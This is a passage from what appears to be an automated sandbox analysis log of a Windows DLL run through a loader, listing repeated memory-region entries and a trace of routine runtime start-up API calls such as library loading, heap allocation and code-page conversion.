= pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15077 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15078 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15079 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15080 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15081 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15082 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15083 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15084 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15085 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15086 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15087 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15088 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15089 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15090 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15091 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15092 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15093 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15094 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15095 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15096 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15097 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15098 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15099 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15100 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15101 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15102 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15103 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15104 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15105 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15106 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15107 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15108 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15109 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15110 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15111 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15112 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15113 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15114 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15115 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15116 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15117 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15118 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15119 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15120 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15121 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15122 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15123 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15124 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15125 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15126 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15127 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15128 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15129 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15130 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15131 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15132 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15133 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15134 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15135 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15136 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15137 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15138 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15139 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15140 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15141 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15142 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15143 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15144 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15145 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15146 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15147 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 15148 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Thread: id = 188 os_tid = 0xbe8 [0182.602] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0182.602] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0182.602] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0182.603] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0182.603] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0182.603] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0182.604] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0182.604] GetProcessHeap () returned 0x570000 [0182.604] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0182.604] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0182.604] GetLastError () returned 0x7e [0182.604] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0182.605] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0182.605] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3c8) returned 0x57c320 [0182.605] SetLastError (dwErrCode=0x7e) [0182.605] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1200) returned 0x583470 [0182.607] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0182.607] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0182.607] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0182.607] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0182.607] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_dump_codec" [0182.607] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_dump_codec" [0182.607] GetACP () returned 0x4e4 [0182.607] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x228) returned 0x575380 [0182.607] IsValidCodePage (CodePage=0x4e4) returned 1 [0182.608] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0182.608] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0182.608] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0182.608] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0182.608] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0182.608] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0182.608] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0182.608] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0182.608] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0182.608] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0182.608] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0182.608] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0182.609] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0182.609] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0182.609] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0182.609] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0182.609] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 